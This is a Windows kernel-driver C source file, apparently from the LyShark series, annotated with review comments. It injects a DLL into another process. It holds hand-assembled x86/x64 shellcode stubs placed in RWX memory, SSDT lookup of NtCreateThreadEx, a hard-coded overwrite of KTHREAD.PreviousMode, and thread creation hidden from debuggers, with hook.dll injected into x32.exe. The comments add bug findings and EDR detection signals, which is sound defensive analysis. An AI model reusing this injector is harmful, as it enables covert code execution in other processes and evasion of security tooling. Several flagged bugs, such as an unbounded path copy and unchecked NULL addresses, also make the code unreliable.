#include "lyshark.h"
/*
 * GetNative64Code - build the x64 user-mode stub that loads DllFullPath.
 *
 * Allocates one PAGE_SIZE region in the current (attached) process with
 * PAGE_EXECUTE_READWRITE, copies the byte stub Code[] to the start of that
 * page and patches its five 8-byte immediate slots (offsets 12, 22, 32, 44
 * and 60) with &Path64, &ModuleHandle, LdrLoadDll, &Complete and &Status,
 * so the stub can call LdrLoadDll and report back through the same page.
 *
 * @param LdrLoadDll   user-mode address of LdrLoadDll in the target process
 *                     (resolved by the caller, not validated here).
 * @param DllFullPath  kernel-side UNICODE_STRING holding the DLL path.
 * @return the page (stub followed by the INJECT_BUFFER fields) on success,
 *         NULL if ZwAllocateVirtualMemory failed. Ownership: nothing on this
 *         page ever frees the allocation.
 *
 * NOTE(review): the stub is written at offset 0 of the same object whose
 * Path64/Buffer/ModuleHandle/Complete/Status fields are addressed below.
 * INJECT_BUFFER's layout is not visible here — confirm that the leading
 * code area is at least sizeof(Code) bytes, otherwise the memcpy of the
 * stub overwrites those fields.
 * NOTE(review): the return value of RtlUnicodeStringCopy is ignored, so a
 * path longer than Buffer is silently truncated and the stub then loads a
 * wrong path.
 * NOTE(review): a private RWX region combined with a kernel-created thread
 * that starts inside it is the classic injection indicator; allocating RW
 * and switching to RX after the patching would at least avoid the RWX page.
 */
PINJECT_BUFFER GetNative64Code(IN PVOID LdrLoadDll, IN PUNICODE_STRING DllFullPath) { NTSTATUS Status = STATUS_SUCCESS; PINJECT_BUFFER InjectBuffer = NULL; SIZE_T Size = PAGE_SIZE;
/* x64 stub. Each zeroed 8-byte run is an immediate operand filled in below.
 * The 32-bit constant 0xC0371E7E embedded after the 4th slot is stored
 * through that slot (&Complete) as the completion marker; the value in eax
 * after the call is stored through the 5th slot (&Status). */
UCHAR Code[] = { 0x48, 0x83, 0xEC, 0x28, 0x48, 0x31, 0xC9, 0x48, 0x31, 0xD2, 0x49, 0xB8, 0, 0, 0, 0, 0, 0, 0, 0, 0x49, 0xB9, 0, 0, 0, 0, 0, 0, 0, 0, 0x48, 0xB8, 0, 0, 0, 0, 0, 0, 0, 0, 0xFF, 0xD0, 0x48, 0xBA, 0, 0, 0, 0, 0, 0, 0, 0, 0xC7, 0x02, 0x7E, 0x1E, 0x37, 0xC0, 0x48, 0xBA, 0, 0, 0, 0, 0, 0, 0, 0, 0x89, 0x02, 0x48, 0x83, 0xC4, 0x28, 0xC3 };
/* Path64 is pointed at the in-page Buffer so user mode can read the string;
 * MaximumLength = sizeof(Buffer) bounds the copy below. */
Status = ZwAllocateVirtualMemory(ZwCurrentProcess(), &InjectBuffer, 0, &Size, MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (NT_SUCCESS(Status)) { PUNICODE_STRING UserPath = &InjectBuffer->Path64; UserPath->Length = 0; UserPath->MaximumLength = sizeof(InjectBuffer->Buffer); UserPath->Buffer = InjectBuffer->Buffer;
RtlUnicodeStringCopy(UserPath, DllFullPath);
/* Stub bytes occupy the first sizeof(Code) bytes of the page. */
memcpy(InjectBuffer, Code, sizeof(Code));
/* Patch the immediate slots. The offsets must track Code[] exactly; the
 * unaligned writes through ULONGLONG* are accepted by MSVC on x64 but are
 * not portable ISO C. */
*(ULONGLONG*)((PUCHAR)InjectBuffer + 12) = (ULONGLONG)UserPath; *(ULONGLONG*)((PUCHAR)InjectBuffer + 22) = (ULONGLONG)&InjectBuffer->ModuleHandle; *(ULONGLONG*)((PUCHAR)InjectBuffer + 32) = (ULONGLONG)LdrLoadDll; *(ULONGLONG*)((PUCHAR)InjectBuffer + 44) = (ULONGLONG)&InjectBuffer->Complete; *(ULONGLONG*)((PUCHAR)InjectBuffer + 60) = (ULONGLONG)&InjectBuffer->Status;
return InjectBuffer; }
/* Reached only when the allocation failed. DllFullPath was used above, so
 * the UNREFERENCED_PARAMETER is redundant (harmless). */
UNREFERENCED_PARAMETER(DllFullPath); return NULL; }
/*
 * GetNative32Code - build the x86 (WOW64) user-mode stub that loads
 * DllFullPath.
 *
 * Same scheme as GetNative64Code: one PAGE_EXECUTE_READWRITE page in the
 * current process, the stub Code[] copied to offset 0, and its five 4-byte
 * slots (offsets 1, 6, 15, 20, 31) patched with &ModuleHandle, &Path32, the
 * rel32 displacement for the call to LdrLoadDll, &Complete and &Status.
 *
 * @param LdrLoadDll   user-mode address of the 32-bit LdrLoadDll.
 * @param DllFullPath  kernel-side UNICODE_STRING holding the DLL path.
 * @return the page on success, NULL if the allocation failed. Nothing on
 *         this page ever frees it.
 *
 * NOTE(review): unlike the 64-bit variant, the path copy is NOT bounded —
 * DllFullPath->Length bytes are memcpy'd into InjectBuffer->Buffer without
 * comparing against sizeof(InjectBuffer->Buffer), and Path32.MaximumLength
 * is taken from the kernel string rather than from the in-page buffer. A
 * long path overruns the page's Buffer field.
 * NOTE(review): the (ULONG) truncations of page/ntdll addresses are only
 * valid while both live below 4 GB — presumably guaranteed by the WOW64
 * process's address range; confirm.
 * NOTE(review): the same layout assumption as in GetNative64Code applies:
 * the INJECT_BUFFER code area must be at least sizeof(Code) bytes.
 */
PINJECT_BUFFER GetNative32Code(IN PVOID LdrLoadDll, IN PUNICODE_STRING DllFullPath) { NTSTATUS Status = STATUS_SUCCESS; PINJECT_BUFFER InjectBuffer = NULL; SIZE_T Size = PAGE_SIZE;
/* x86 stub. Zeroed 4-byte runs are immediate operands patched below; the
 * 0xE8 at offset 14 takes a rel32 displacement at offset 15. 0xC0371E7E is
 * stored through the 4th slot (&Complete) as the completion marker. */
UCHAR Code[] = { 0x68, 0, 0, 0, 0, 0x68, 0, 0, 0, 0, 0x6A, 0, 0x6A, 0, 0xE8, 0, 0, 0, 0, 0xBA, 0, 0, 0, 0, 0xC7, 0x02, 0x7E, 0x1E, 0x37, 0xC0, 0xBA, 0, 0, 0, 0, 0x89, 0x02, 0xC2, 0x04, 0x00 };
/* Path32 describes the in-page Buffer using a 32-bit UNICODE_STRING32. */
Status = ZwAllocateVirtualMemory(ZwCurrentProcess(), &InjectBuffer, 0, &Size, MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (NT_SUCCESS(Status)) { PUNICODE_STRING32 pUserPath = &InjectBuffer->Path32; pUserPath->Length = DllFullPath->Length; pUserPath->MaximumLength = DllFullPath->MaximumLength; pUserPath->Buffer = (ULONG)(ULONG_PTR)InjectBuffer->Buffer;
/* Unbounded copy — see the NOTE in the header. */
memcpy((PVOID)pUserPath->Buffer, DllFullPath->Buffer, DllFullPath->Length);
memcpy(InjectBuffer, Code, sizeof(Code));
/* Slot 15 is the rel32 for the call at offset 14: target minus the address
 * of the following instruction (page + 19), written here as
 * target - (page + 15) - 5 + 1. The remaining slots are absolute addresses. */
*(ULONG*)((PUCHAR)InjectBuffer + 1) = (ULONG)(ULONG_PTR)&InjectBuffer->ModuleHandle; *(ULONG*)((PUCHAR)InjectBuffer + 6) = (ULONG)(ULONG_PTR)pUserPath; *(ULONG*)((PUCHAR)InjectBuffer + 15) = (ULONG)((ULONG_PTR)LdrLoadDll - ((ULONG_PTR)InjectBuffer + 15) - 5 + 1); *(ULONG*)((PUCHAR)InjectBuffer + 20) = (ULONG)(ULONG_PTR)&InjectBuffer->Complete; *(ULONG*)((PUCHAR)InjectBuffer + 31) = (ULONG)(ULONG_PTR)&InjectBuffer->Status;
return InjectBuffer; }
/* Reached only when the allocation failed; the macro is redundant here. */
UNREFERENCED_PARAMETER(DllFullPath); return NULL; }
/*
 * SeCreateThreadEx - invoke NtCreateThreadEx from kernel mode with the
 * calling thread's PreviousMode forced to KernelMode.
 *
 * NtCreateThreadEx is looked up through the SSDT with the project helpers
 * GetSSDTFuncCurAddr/GetIndexByName (defined elsewhere, not visible here).
 * Presumably because the Nt* entry validates its pointer arguments against
 * PreviousMode, the byte at PsGetCurrentThread() + 0x232 is set to
 * KernelMode around the call and restored afterwards.
 *
 * @return the status returned by NtCreateThreadEx, or STATUS_NOT_FOUND when
 *         the SSDT lookup yields NULL.
 *
 * NOTE(review): 0x232 is a hard-coded KTHREAD offset taken from specific
 * builds; no OS-version check guards it. On any other build this writes
 * into an unrelated KTHREAD byte. Overwriting PreviousMode is also exactly
 * the primitive kernel integrity monitors and PatchGuard-era mitigations
 * watch for, so this routine is both fragile and highly detectable.
 * NOTE(review): if NtCreateThreadEx raises, prevMode is never restored.
 * NOTE(review): DbgPrint("%p") discloses a kernel function pointer and the
 * user-mode start address to anyone collecting debug output.
 */
NTSTATUS NTAPI SeCreateThreadEx(OUT PHANDLE ThreadHandle, IN ACCESS_MASK DesiredAccess, IN PVOID ObjectAttributes, IN HANDLE ProcessHandle, IN PVOID StartAddress, IN PVOID Parameter, IN ULONG Flags, IN SIZE_T StackZeroBits, IN SIZE_T SizeOfStackCommit, IN SIZE_T SizeOfStackReserve, IN PNT_PROC_THREAD_ATTRIBUTE_LIST AttributeList) { NTSTATUS Status = STATUS_SUCCESS;
LPFN_NTCREATETHREADEX NtCreateThreadEx = (LPFN_NTCREATETHREADEX)(GetSSDTFuncCurAddr(GetIndexByName((UCHAR *)"NtCreateThreadEx"))); DbgPrint("线程函数地址: %p --> 开始执行地址: %p \n", NtCreateThreadEx, StartAddress);
if (NtCreateThreadEx) {
/* Hard-coded KTHREAD.PreviousMode offset — build-specific, see header. */
PUCHAR pPrevMode = (PUCHAR)PsGetCurrentThread() + 0x232;
UCHAR prevMode = *pPrevMode;
*pPrevMode = KernelMode;
Status = NtCreateThreadEx(ThreadHandle, DesiredAccess, ObjectAttributes, ProcessHandle, StartAddress, Parameter, Flags, StackZeroBits, SizeOfStackCommit, SizeOfStackReserve, AttributeList);
/* Restore the saved mode; not reached if the call above raises. */
*pPrevMode = prevMode; } else { Status = STATUS_NOT_FOUND; } return Status; }
/*
 * ExecuteInNewThread - start BaseAddress as a new thread in the current
 * process and optionally wait for it to finish.
 *
 * The thread is created through SeCreateThreadEx with OBJ_KERNEL_HANDLE,
 * THREAD_QUERY_LIMITED_INFORMATION, the caller's Flags, 0x1000 bytes of
 * committed and 0x100000 bytes of reserved stack. When Wait is set, an
 * alertable wait of up to 60 s (600,000,000 x 100 ns, relative) is done and
 * the thread's ExitStatus is fetched with ZwQueryInformationThread.
 *
 * @param BaseAddress  user-mode start address; not validated here.
 * @param ExitStatus   may be NULL; written only when the query succeeds.
 * @return the creation status, or the wait/query status when Wait is set.
 *
 * NOTE(review): STATUS_TIMEOUT satisfies NT_SUCCESS, so after the 60 s
 * timeout the code still reads ExitStatus from a thread that is still
 * running and reports it as if the thread had finished.
 * NOTE(review): the caller on this page passes its stub page as
 * BaseAddress, which is NULL when that allocation failed; nothing rejects
 * a NULL start address before the thread is created.
 * NOTE(review): the failure message names ZwCreateThreadEx, but the call
 * is SeCreateThreadEx.
 */
NTSTATUS ExecuteInNewThread(IN PVOID BaseAddress, IN PVOID Parameter, IN ULONG Flags, IN BOOLEAN Wait, OUT PNTSTATUS ExitStatus) { HANDLE ThreadHandle = NULL; OBJECT_ATTRIBUTES ObjectAttributes = { 0 };
InitializeObjectAttributes(&ObjectAttributes, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);
/* Negative QuadPart = relative timeout in 100 ns units: 60 seconds. */
NTSTATUS Status = SeCreateThreadEx(&ThreadHandle, THREAD_QUERY_LIMITED_INFORMATION, &ObjectAttributes, ZwCurrentProcess(), BaseAddress, Parameter, Flags, 0, 0x1000, 0x100000, NULL); if (NT_SUCCESS(Status) && Wait != FALSE) { LARGE_INTEGER Timeout = { 0 }; Timeout.QuadPart = -(60ll * 10 * 1000 * 1000);
/* Alertable wait; a timeout is still NT_SUCCESS (see header). */
Status = ZwWaitForSingleObject(ThreadHandle, TRUE, &Timeout); if (NT_SUCCESS(Status)) { THREAD_BASIC_INFORMATION ThreadBasicInfo = { 0 }; ULONG ReturnLength = 0;
Status = ZwQueryInformationThread(ThreadHandle, ThreadBasicInformation, &ThreadBasicInfo, sizeof(ThreadBasicInfo), &ReturnLength);
if (NT_SUCCESS(Status) && ExitStatus) { *ExitStatus = ThreadBasicInfo.ExitStatus; } else if (!NT_SUCCESS(Status)) { DbgPrint("%s: ZwQueryInformationThread failed with status 0x%X\n", __FUNCTION__, Status); } } else { DbgPrint("%s: ZwWaitForSingleObject failed with status 0x%X\n", __FUNCTION__, Status); } } else { DbgPrint("%s: ZwCreateThreadEx failed with status 0x%X\n", __FUNCTION__, Status); }
/* The handle is kernel-only (OBJ_KERNEL_HANDLE) and closed on every path. */
if (ThreadHandle) { ZwClose(ThreadHandle); } return Status; }
/*
 * AttachAndInjectProcess - load DllPath into the process identified by
 * ProcessID, driven entirely from kernel mode.
 *
 * Steps: look up the EPROCESS, classify the target as 32- or 64-bit with
 * PsGetProcessWow64Process, KeStackAttachProcess into it, find ntdll and
 * its LdrLoadDll export through the project helpers GetUserModuleAddress /
 * GetModuleExportAddress (defined elsewhere), build the matching stub page
 * (GetNative32Code / GetNative64Code) and run it in a new thread created
 * with THREAD_CREATE_FLAGS_HIDE_FROM_DEBUGGER, waiting for it to finish.
 *
 * @param ProcessID  target PID as a HANDLE; NULL yields STATUS_UNSUCCESSFUL.
 * @param DllPath    NUL-terminated wide path (RtlInitUnicodeString requires
 *                   the terminator).
 * @return the last value left in Status; note that ExecuteInNewThread
 *         overwrites Status with the injected thread's exit status, and the
 *         __except handler maps any access violation to STATUS_UNSUCCESSFUL.
 *
 * NOTE(review): the STATUS_NOT_FOUND set when ntdll or LdrLoadDll is not
 * found is not consulted before the stub is built and started — the stub
 * is generated with LdrLoadDll == NULL and a thread is still created. The
 * same holds when GetNative*Code returns NULL: ExecuteInNewThread is then
 * called with a NULL start address.
 * NOTE(review): the stub page is never freed, so every call leaves a RWX
 * page behind in the target process.
 * Detection perspective: this is what an EDR observes — a thread in a user
 * process whose creator is kernel code, starting in private RWX memory,
 * flagged hide-from-debugger, followed by a LdrLoadDll of a path that no
 * module in the process references. Those three signals together are a
 * strong injection indicator regardless of the DLL contents.
 */
NTSTATUS AttachAndInjectProcess(IN HANDLE ProcessID, PWCHAR DllPath) { PEPROCESS EProcess = NULL; KAPC_STATE ApcState; NTSTATUS Status = STATUS_SUCCESS;
if (ProcessID == NULL) { Status = STATUS_UNSUCCESSFUL; return Status; }
/* Takes a reference on EProcess; released by ObDereferenceObject below. */
Status = PsLookupProcessByProcessId(ProcessID, &EProcess); if (Status != STATUS_SUCCESS) { return Status; }
BOOLEAN IsWow64 = (PsGetProcessWow64Process(EProcess) != NULL) ? TRUE : FALSE;
/* Everything inside __try runs in the target's address space. */
KeStackAttachProcess((PRKPROCESS)EProcess, &ApcState); __try { PVOID NtdllAddress = NULL; PVOID LdrLoadDll = NULL; UNICODE_STRING NtdllUnicodeString = { 0 }; UNICODE_STRING DllFullPath = { 0 };
RtlInitUnicodeString(&NtdllUnicodeString, L"Ntdll.dll"); NtdllAddress = GetUserModuleAddress(EProcess, &NtdllUnicodeString, IsWow64); if (!NtdllAddress) { Status = STATUS_NOT_FOUND; }
if (NT_SUCCESS(Status)) { LdrLoadDll = GetModuleExportAddress(NtdllAddress, "LdrLoadDll", EProcess); if (!LdrLoadDll) { Status = STATUS_NOT_FOUND; } }
/* Status is not checked here: the stub is built even if LdrLoadDll is NULL. */
PINJECT_BUFFER InjectBuffer = NULL; if (IsWow64) { RtlInitUnicodeString(&DllFullPath, DllPath); InjectBuffer = GetNative32Code(LdrLoadDll, &DllFullPath); DbgPrint("[*] 注入32位DLL \n"); } else { RtlInitUnicodeString(&DllFullPath, DllPath); InjectBuffer = GetNative64Code(LdrLoadDll, &DllFullPath); DbgPrint("[*] 注入64位DLL \n"); }
/* InjectBuffer may be NULL here; Status receives the thread's exit status. */
ExecuteInNewThread(InjectBuffer, NULL, THREAD_CREATE_FLAGS_HIDE_FROM_DEBUGGER, TRUE, &Status); if (!NT_SUCCESS(Status)) { DbgPrint("ExecuteInNewThread Failed\n"); } } __except (EXCEPTION_EXECUTE_HANDLER) { Status = STATUS_UNSUCCESSFUL; } KeUnstackDetachProcess(&ApcState); ObDereferenceObject(EProcess); return Status; }
/*
 * Unload - driver unload routine.
 *
 * Logs only. The stub page and the DLL loaded by AttachAndInjectProcess
 * remain in the target process after the driver is gone.
 */
VOID Unload(PDRIVER_OBJECT pDriverObj)
{
    UNREFERENCED_PARAMETER(pDriverObj);
    DbgPrint("[-] 驱动卸载 \n");
}
/*
 * DriverEntry - driver entry point.
 *
 * Resolves the SSDT through the project helper GetKeServiceDescriptorTable64
 * into the global KeServiceDescriptorTable, looks up the PID of "x32.exe"
 * with GetProcessID (defined elsewhere), injects C:\hook.dll into it and
 * finally installs Unload. Always returns STATUS_SUCCESS.
 *
 * NOTE(review): "%d" with a HANDLE argument is a printf format/argument
 * mismatch (a pointer printed as int); "%p" or a cast to ULONG matches.
 * NOTE(review): the result of AttachAndInjectProcess is discarded, and the
 * value stored in KeServiceDescriptorTable is not checked before the
 * injection path walks the SSDT. Target name and DLL path are hard-coded,
 * and RegPath is unused.
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegPath) { DbgPrint("Hello LyShark \n");
/* Global consumed by GetSSDTFuncCurAddr in SeCreateThreadEx. */
KeServiceDescriptorTable = (PSYSTEM_SERVICE_TABLE)GetKeServiceDescriptorTable64(DriverObject);
/* GetProcessID may return NULL; AttachAndInjectProcess rejects that. */
HANDLE processid = GetProcessID("x32.exe"); DbgPrint("进程PID = %d \n", processid);
AttachAndInjectProcess(processid, L"C:\\hook.dll");
/* DriverUnload is set only after the injection already ran. */
DriverObject->DriverUnload = Unload; return STATUS_SUCCESS; }